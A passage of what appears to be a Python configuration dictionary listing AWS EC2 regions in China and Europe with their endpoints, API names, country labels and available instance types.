"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
],
"signature_version": "4",
},
"cn-north-1": {
"api_name": "ec2_cn_north",
"country": "China",
"endpoint": "ec2.cn-north-1.amazonaws.com.cn",
"id": "cn-north-1",
"instance_types": [],
"signature_version": "4",
},
"cn-northwest-1": {
"api_name": "ec2_cn_northwest",
"country": "China",
"endpoint": "ec2.cn-northwest-1.amazonaws.com.cn",
"id": "cn-northwest-1",
"instance_types": [],
"signature_version": "4",
},
"eu-central-1": {
"api_name": "ec2_eu_central",
"country": "Frankfurt",
"endpoint": "ec2.eu-central-1.amazonaws.com",
"id": "eu-central-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"eu-north-1": {
"api_name": "ec2_eu_north_stockholm",
"country": "Stockholm",
"endpoint": "ec2.eu-north-1.amazonaws.com",
"id": "eu-north-1",
"instance_types": [
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"hpc6a.48xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
],
"signature_version": "4",
},
"eu-south-1": {
"api_name": "ec2_eu_south",
"country": "Italy",
"endpoint": "ec2.eu-south-1.amazonaws.com",
"id": "eu-south-1",
"instance_types": [
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
],
"signature_version": "4",
},
"eu-west-1": {
"api_name": "ec2_eu_west",
"country": "Ireland",
"endpoint": "ec2.eu-west-1.amazonaws.com",
"id": "eu-west-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"d3en.12xlarge",
"d3en.2xlarge",
"d3en.4xlarge",
"d3en.6xlarge",
"d3en.8xlarge",
"d3en.xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5.12xlarge",
"g5.16xlarge",
"g5.24xlarge",
"g5.2xlarge",
"g5.48xlarge",
"g5.4xlarge",
"g5.8xlarge",
"g5.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
